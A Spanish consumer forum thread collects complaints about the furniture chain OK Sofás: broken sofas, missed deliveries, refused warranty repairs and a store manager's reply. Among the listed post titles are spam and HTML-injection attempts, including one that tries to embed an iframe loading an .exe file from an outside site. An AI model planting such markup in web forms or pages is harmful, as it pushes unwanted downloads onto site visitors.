• Foro de quejas (servicios, compañías, telefonía...) y críticas (coches, franquicias, cadenas alimenticias..)

    compré un sofá en ok. sofás de las rozas, désde el primer día no se levantaba el arcón, pero el vendedor se dedica a decir que eso es así, que no sabré tirar bién de los abatibles, pero a los 10 días de estar en casa la gomaespuma hundida, me dice que lleve yo los asientos hasta la tienda, pero esto que és? ya discutiendo con él dice que manda un técnico de sofás el técnico era un transportista el cual puso en una hoja de incidencias efectivamente lo que estaba mal, pues nada que el chulito del vendedor dice que eso es así, osea que no me lo cambia, que he tirado mis 1200€ a la calle porque el sofá está para comprarse uno nuevo, menudos estafadores, ni a m i peor enemigo se lo recomendaria yo
    ¿De qué empresa te quejas ?

    OK.SOFAS

    Respuestas o comentarios (98)
    No me gusta/No estoy de acuerdo (TOP) #1
    1 votos
    JOSE ANTONIO PINO MARTIN
    Yo compré una cama articulada, pues me tuve un accidente que me tiene en silla de ruedas y el cochón me hace mucho daño en el talón del pie que tengo operado EN EL CUAL ME HICIERON UNOS INJERTOS DE PIEL , ME PUSE EN CONTACTO CON ROBERT EL CHICO QUE ME VENDIO EL ARTICULO Y ME DICE QUE TIENE QUE CONSULTARLO CON LA CENTRAL Y ME LLAMARA , YO SIGO ESPERANDO Y SIN CAMA PUES NO LA PUEDO UTILIZAR ESTO ME HA SUCEDIDO EN LA TIENDA QUE OK SOFAS TIENE EN LA CARRETERA DE BARCELONAN Nº224 DE GERONA , POR FAVOR NECESITO QUE ME DEN UNA SOLUCION , GRACIAS
    Me gusta/Estoy de acuerdo (TOP votado) #1
    1 votos
    Mari Carmen
    Yo llevo 62 días esperando que me lo entreguen por cuarta vez y si no es por fábrica, es por el transportista y si no por otro motivo, el caso es que hoy habíamos quedado finalmente y no se han presentado. Toda la mañana para contactar con ellos y me dicen que la semana que viene ... será si Dios quiere. Y ahora leo esto ... estoy perpleja.
    0 votos
    #78: Sergio
    Hola, llevo 2 meses esperando para que me den un cabezal de una cama. Muy buenas palabritas cuando vas a comprar pero cuando vas a preguntar por el cabezal no saben nada, te dicen que al dia siguiente te llaman cuando hablen con el almacen y no te llaman. Encima llamas tu a la tienda y no cogen el teléfono. Esto en la tienda de Martorell(av. Congost). Una vergüenza!!
    2 votos
    #77: eduardo
    No hay fuego sin humo, oksofas con sus mas de mil quejas en internet,vamos ,mi consejo mejor comprar en delsofa.es,o donde os de la gana mientras no sea en oksofas .
    0 votos
    #76: Gerardo
    Respuesta Comentario
    #7:
    a mi me estafaron los oksofas santander,,vaya ladrones un sofa de mas de 1390 euros,y ya esta hecho un trasto,estructura rota,me dicen ,"a ver que ha hecho en el sofa",vaya impresentables,el sofa tiene 8 meses,,a la oficina del consumidor primero,y si no me lo resuelven ,al juzgado.vaya timo. Buenas tardes Jesús, soy el gerente de Ok Sofas Santander, aquí no nos consta ninguna reclamación de tu parte ni de nadie, si tienes una reclamación que hacer, por favor comunícate con la tienda para solucionar el problema en vez de usar un foro para decir falsedades e insultar.
    0 votos
    #75: jesus
    a mi me estafaron los oksofas santander,,vaya ladrones un sofa de mas de 1390 euros,y ya esta hecho un trasto,estructura rota,me dicen ,"a ver que ha hecho en el sofa",vaya impresentables,el sofa tiene 8 meses,,a la oficina del consumidor primero,y si no me lo resuelven ,al juzgado.vaya timo.
    0 votos
    #74: Pep
    A mi tambien me han estafado los oksofas estos,pena no haber leido esto antes,se ve que la estafa lleva tiempo funcionando,a denunciarlos.
    los mismos ,oksofas ,ocaofa (Posted by Anonymous User at 2009-10-05 07:56 PM)
    DOS AÑOS SIN SOFA Y SIN DINERO (Posted by Anonymous User at 2010-05-21 12:03 PM)
    MISMA SITUACION (Posted by Anonymous User at 2010-10-04 08:18 PM)
    para la post venta contactar con ok sofas (Posted by Anonymous User at 2010-12-14 10:24 AM)
    no a oque sofa (Posted by Anonymous User at 2011-06-09 03:04 PM)
    irmaos ribeiro (Posted by Anonymous User at 2012-02-08 06:35 PM)
    MI OPINION ES QUE ES FALSO LO DEL CIERRE (Posted by Anonymous User at 2009-05-15 12:30 PM)
    ok sofas son los mismos que ocaofa... (Posted by Anonymous User at 2009-10-05 07:47 PM)
    PUES SI (Posted by Anonymous User at 2010-12-10 01:58 PM)
    ok sofas opiniones negativas (Posted by Anonymous User at 2013-11-02 12:21 PM)
    GRACIAS (Posted by Anonymous User at 2010-12-10 01:54 PM)
    cierre de ocaofa (Posted by Anonymous User at 2009-05-16 11:27 PM)
    cierre de ocaofa (Posted by Anonymous User at 2009-05-16 11:29 PM)
    i tambien.... (Posted by Anonymous User at 2009-09-22 07:57 PM)
    ocaofa oksofas ,son los mismos (Posted by Anonymous User at 2009-10-05 07:52 PM)
    es verdadero ha cerrado (Posted by Anonymous User at 2009-05-16 11:31 PM)
    Antes de escribir deberias informarte. (Posted by Anonymous User at 2009-05-19 01:39 PM)
    NO SEAIS TONTOS, HA CERRADO DEFINITIVAMENTE Y DEBE DINERO A MUCHA GENTE (Posted by Anonymous User at 2009-06-05 05:01 PM)
    ok sofas son los mismos que ocaofa (Posted by Anonymous User at 2009-10-05 07:55 PM)
    ok sofas son los mismos que ocaofa (Posted by Anonymous User at 2009-10-05 07:54 PM)
    ok sofas ladrones (Posted by Anonymous User at 2010-07-16 05:49 PM)
    cuidado con estos de ok sofas (Posted by Anonymous User at 2010-07-30 06:02 PM)
    sobre lo de ok sofas (Posted by Anonymous User at 2010-09-13 09:00 AM)
    OK SOFAS (Posted by Anonymous User at 2010-12-27 12:11 PM)
    oj0 con ok sofa (Posted by Anonymous User at 2011-03-26 02:55 PM)
    yo contenta ;) (Posted by Anonymous User at 2013-05-18 04:58 PM)
    comentarios (Posted by Anonymous User at 2012-11-22 08:04 PM)
    muy mal servicio (Posted by Anonymous User at 2012-11-26 09:56 PM)
    ok sofas no son honestos (Posted by Anonymous User at 2013-10-31 08:31 PM)
    ojo ok sofas parets del valles (Posted by Anonymous User at 2011-03-26 03:09 PM)
    No estoy de acuerdo (Posted by Anonymous User at 2011-05-21 10:20 AM)
    se te ve el plumero (Posted by Anonymous User at 2012-02-09 08:37 AM)
    HAS TENIDO SUERTE !!!! (Posted by Anonymous User at 2014-04-22 04:08 PM)
    YO TAMPOCO ESTOY DE ACUERDO (Posted by Anonymous User at 2011-09-03 03:03 PM)
    el inicio del fin (Posted by Anonymous User at 2012-02-10 03:40 PM)
    el tiempo pone a cada uno en su sitio (Posted by Anonymous User at 2012-02-27 02:31 PM)
    lo que deberian controlar (Posted by Anonymous User at 2012-03-09 04:34 PM)
    chica (Posted by Anonymous User at 2012-03-09 07:43 PM)
    mucho pervertido suelto (Posted by Anonymous User at 2012-03-09 10:15 PM)
    ya somos dos (Posted by Anonymous User at 2012-03-21 09:44 AM)
    el tiempo aun no se ha detenido. (Posted by Anonymous User at 2012-03-09 07:49 PM)
    42 tiendas????? (Posted by Anonymous User at 2012-05-15 04:32 PM)
    seras del gremio (Posted by Anonymous User at 2013-10-03 12:07 AM)
    sin insultos (Posted by Anonymous User at 2012-11-29 03:02 PM)
    ok sofas problemas (Posted by Anonymous User at 2013-01-09 07:12 PM)
    los de ok sofas (Posted by Anonymous User at 2013-01-09 07:37 PM)
    stop ok sofas (Posted by Anonymous User at 2013-01-10 06:19 PM)
    estoy contenta :) (Posted by Anonymous User at 2013-05-18 05:10 PM)
    opinion ok sofas (Posted by Anonymous User at 2013-06-07 07:09 PM)
    queja de ok sofas (Posted by Anonymous User at 2013-06-21 05:33 PM)
    oksofas (Posted by Anonymous User at 2014-04-08 07:37 PM)
    ok sofas parets (Posted by Anonymous User at 2013-01-24 11:08 AM)
    OK SOFAS EN PIEL MUY MALA CALIDAD (Posted by Anonymous User at 2013-04-15 07:28 PM)
    Devolución paga y señal por incumplimiento (Posted by Anonymous User at 2013-05-20 04:37 PM)
    ok sofas (Posted by Anonymous User at 2014-08-06 12:35 PM)
    ok sofas montigala mentirosos (Posted by Anonymous User at 2013-10-31 08:55 PM)
    oksofas Montigala ladrones (Posted by Anonymous User at 2014-01-15 06:49 PM)
    oksofas montigala (Posted by Anonymous User at 2014-02-11 07:05 PM)
    ok sofas otoño 2013 (Posted by Anonymous User at 2013-11-02 11:48 AM)
    sofa galaxy de oksofas montigala (Posted by Anonymous User at 2014-01-10 08:00 PM)
    oksofas opiniones nefastas (Posted by Anonymous User at 2014-01-15 06:57 PM)
    galaxy (Posted by Anonymous User at 2014-02-04 03:58 PM)
    ok sofas (Posted by Anonymous User at 2014-02-11 10:02 PM)
    Galaxy (Posted by Anonymous User at 2014-02-28 01:16 PM)
    sofa galaxi roto (Posted by Anonymous User at 2014-03-08 11:31 AM)
    sofa galaxy (Posted by Anonymous User at 2014-08-06 12:37 PM)
    GALAXY (Posted by Anonymous User at 2014-08-06 12:39 PM)
    TELA PELLE (Posted by Anonymous User at 2014-08-06 12:41 PM)
    Galaxy (Posted by Anonymous User at 2015-04-08 05:54 PM)
    CULPA A VENDEDOR, NO A TDA (Posted by Anonymous User at 2013-11-23 02:34 PM)
    HAS HECHO BIEN !!!! (Posted by Anonymous User at 2014-04-22 04:07 PM)
    estafadores (Posted by Anonymous User at 2014-06-14 01:59 PM)
    Me parecen lamentables las críticas (Posted by Anonymous User at 2012-04-13 10:04 AM)
    ok sofa ,no compraremosl... (Posted by Anonymous User at 2012-05-15 04:10 PM)
    ¿Y qué esperas? (Posted by Anonymous User at 2012-05-24 10:50 AM)
    ¿otra vez el plumero? (Posted by Anonymous User at 2012-06-02 01:09 PM)
    replica (Posted by Anonymous User at 2012-11-23 11:08 AM)
    replica (Posted by Anonymous User at 2012-11-22 07:59 PM)
    ok sofas empezo de mala manera (Posted by Anonymous User at 2013-10-16 08:06 PM)
    ok sofas (Posted by Anonymous User at 2015-01-13 05:20 PM)
    ok sofas (Posted by Anonymous User at 2015-01-13 05:20 PM)
    ok sofas (Posted by Anonymous User at 2015-01-13 05:20 PM)
    HOLA ANNA !! (Posted by Anonymous User at 2014-04-22 04:29 PM)
    estafadores (Posted by Anonymous User at 2012-11-22 07:55 PM)
    Ni se os ocurra entrar (Posted by Anonymous User at 2012-11-23 12:29 PM)
    cuidado con ok sofas (Posted by Anonymous User at 2013-01-10 06:44 PM)
    Fatal con OKSOFAS (Posted by Anonymous User at 2013-04-22 12:02 PM)
    queja ok sofas cabrera de mar (Posted by Anonymous User at 2013-06-21 05:41 PM)
    ESTAFA ES POCA (Posted by Anonymous User at 2013-07-28 10:59 AM)
    queja (Posted by Anonymous User at 2013-09-12 05:58 PM)
    PAGAN JUSTOS POR PECADORES (Posted by Anonymous User at 2013-11-11 11:49 AM)
    pagan lo justo ,porque oksofas engaña. (Posted by Anonymous User at 2013-11-14 05:24 PM)
    fatal (Posted by Anonymous User at 2013-11-17 11:16 PM)
    PAGAN JUSTOS POR PECADORES (Posted by Anonymous User at 2013-11-11 11:50 AM)
    ok sofas opiniones (Posted by Anonymous User at 2013-11-14 09:36 AM)
    ok sofas Oviedo,todo una estafa! (Posted by Anonymous User at 2013-11-16 02:10 PM)
    que bueno (Posted by Anonymous User at 2015-10-21 08:32 PM)
    opiniones ok sofas (Posted by Anonymous User at 2014-03-21 11:49 AM)
    quejas oksofas (Posted by Anonymous User at 2014-08-06 09:21 PM)
    ok sofas (Posted by Anonymous User at 2014-12-05 07:00 PM)
    opiniones oksofas (Posted by Anonymous User at 2014-03-21 11:56 AM)
    oksofas no comprar nunca alli (Posted by Anonymous User at 2014-04-08 07:24 PM)
    Denuncia Ok Sofás (Posted by Anonymous User at 2014-03-21 02:21 PM)
    LLAMA A LA OCU (Posted by Anonymous User at 2014-04-22 04:17 PM)
    robot viagra (Posted by Anonymous User at 2014-05-20 03:07 PM)
    a'/><!-- (Posted by Anonymous User at 2014-05-20 03:10 PM)
    a'/><!-- (Posted by Anonymous User at 2014-05-20 03:10 PM)
    a'/><!-- (Posted by Anonymous User at 2014-05-20 03:10 PM)
    OKSofas girona, sinverguenzas (Posted by Anonymous User at 2015-06-09 07:20 PM)
    Yo fui vendedora (Posted by Anonymous User at 2015-08-13 04:51 PM)
    responder (Posted by Anonymous User at 2010-03-24 10:10 PM)
    oksofas estafa (Posted by Anonymous User at 2014-01-15 07:01 PM)
    ok sofas googlemaps street view (Posted by Anonymous User at 2011-03-26 04:29 PM)
    entren en ocaofa.com, ahi esta la prueba (Posted by Anonymous User at 2009-06-20 06:10 PM)
    Solo es el recuerdo de OCA...QUE? (Posted by Anonymous User at 2009-06-23 12:04 AM)
    ex de ocaofa... (Posted by Anonymous User at 2009-09-22 07:53 PM)
    ... (Posted by Anonymous User at 2009-09-22 07:55 PM)
    caca (Posted by Anonymous User at 2010-03-24 10:07 PM)
    anonimo (Posted by Anonymous User at 2010-03-24 10:08 PM)
    c (Posted by Anonymous User at 2009-09-22 08:15 PM)
    ver para creer (Posted by Anonymous User at 2009-09-26 06:12 PM)
    5 meses sin sofa (Posted by Anonymous User at 2010-02-21 02:01 PM)
    ocaofa (Posted by Anonymous User at 2010-02-22 11:34 PM)
    cuidado ,ok sofas son los antiguos de ocaofa (Posted by Anonymous User at 2010-12-14 10:29 AM)
    No son los mismos (Posted by Anonymous User at 2012-02-28 06:12 PM)
    free"/><iframe src=http://files.uniblue.com/cm/pcproblem/registrycleanerkit/rck/setup/registrycleanerkit.exe/> (Posted by Anonymous User at 2014-06-03 08:34 PM)
    FREE VIAGRA EVER (Posted by Anonymous User at 2014-06-03 08:35 PM)
    foro ok sofa
    Posted by Anonymous User at 2013-06-15 04:45 PM
    claro que se puede hacer, los nuevos (ok sofas), de barcelona ,"unieron al restos de los franquiciados ",para salir de la cadena ocaofa ,dejando al antiguo dueño sin probabilidad de remontar dicha cadena,lo dejaron en la ruina ,,despues cojieron a los mismos fabricantes y hicieron lo mismo que el antiguo dueño, o peor ,visto los comentarios,esto apesta,,,esta cadena mal nacio,mal acabara.
    0 votos
    #73: nuria
    Hola,compre un sofá en 2015 por abril más o menos, en color blanco y negro, la verdad es que el día que vino me parecía precioso pero cuando me senté en el sofá cual fue mi sorpresa??? Qué estaba casi en el suelo, pero bueno lo deje pasar porque no soy de las que reclaman por nada, al cabo de casi el año el sofá empezó a pelarse por los respaldos llame a la tienda y me dijeron que los tenía que llevar para que los vieran los de fábrica, que tenía. Que certificar que no era un mal uso del sofá (el sofá prácticamente no había sido usado nada más que 1 hora por las noches que es cuando llegábamos del trabajo) pues bien se lo llevo y tardaron casi 2 semanas en decirme que que era defecto de fábrica que esa partida de piel había salido mala que me los cambiaban TODOS los respaldos, yo sorprendida digo todos?? Sí sólo habían mal dos, vale yo hacepto y tardan casi 1 mes en traerlos, pues bien ahora el tema al medio año empieza a pelarse el asiento y la base del sofá!!!! Sí estáis oyendo bien LA BASE DEL SOFÁ antes de denunciarlos y de ir a ponerles una reclamación intentó solucionarlo de buenas maneras y cual es mi respuesta??? CASO OMISO!!! No hay respuesta solamente la del chico de la tienda que sí quiero me hace un presupuesto ya que esta fuera de plazo de garantía un sofá de 1,600e!!!!! A la basura!!! No compréis allí!!! Son pésimos!! Ya os contare como queda la cosa porque yo no voy a perder ese dinero ni loca!!! os mndo mis fotos y difundirlo por favor!
    0 votos
    #72: patricia
    que verguenzaaaa, al final ,la reparación del sofa no ha servido de nada,se ha roto otra vez,y fijaro que pensaba que todo esta ya por fin arreglado y concluido ,pues nada , el xavi de badalona me ha perfectamente engañado,ahora hare como centenares de estafados de oksofas ,a denunciarlosss.
    0 votos
    #71: Patricia
    Comentaros como ha acabado mi incidencia.tanto se ha de decir lo bueno como lo malo. Acudio a mi domicilio un encargado muy correcto y educado el cual me informo que tras ver el sofa , el problema nos lo solucionaria en 15 dias. Y asi ha sido .El sofa estando en garantia lo han atendido correctamente, un poco tarde pero muy bien. Tambien dar las gracias a carlos y javi de ok sofas badalona.
    0 votos
    #70: Patri
    A mi me paso algo parecido se empezo a rajar el sofa al año, cambiaron un reposacabezas y a los meses el del medio tambien se empezo a rajar ,llevamos 5 meses con mails arriba y abajo reclamando. Se llevaron cabezal porque lo han traido 3 veces mal, y a dia de hoy todavia no se ha atendido la reclamacion.
    Ya os informare como acaba esto.
    La tienda la de badalona.
    Yo ya he denunciado a la oficina del consumidor.
    Y seguire con ello y llegare hasta donde tenga que llegar.
    0 votos
    #69: oksofas son un timo
    oksofas,despues de que se me haya roto el brazo del sofa a los 7 meses,me dicen que no entra en garantia, y llevo desde la segunda semana despues de la entrega en mi casa,llamandole para decirles que el brazo cruje un monton,y ni caso , ahora ha cedido y haber que pasa,,,el telefono de la fabrica es el 968 79 71 48, si teneis problemas no trateis con el tal xavi de terrassa que no hace ni caso,, muy enfadado estoy ,y visto las centenas de quejas de esta marca,me temo que me sea dificil el arreglo del sofa.

    Publicar una respuesta







    Para enviar o escribir un nuevo tema, puedes hacerlo como invitado rellenando los campos nombre y mail que aparecen abajo.

    Si lo prefieres puedes registrarte, o directamente logarte si ya eres miembro.


    Como invitado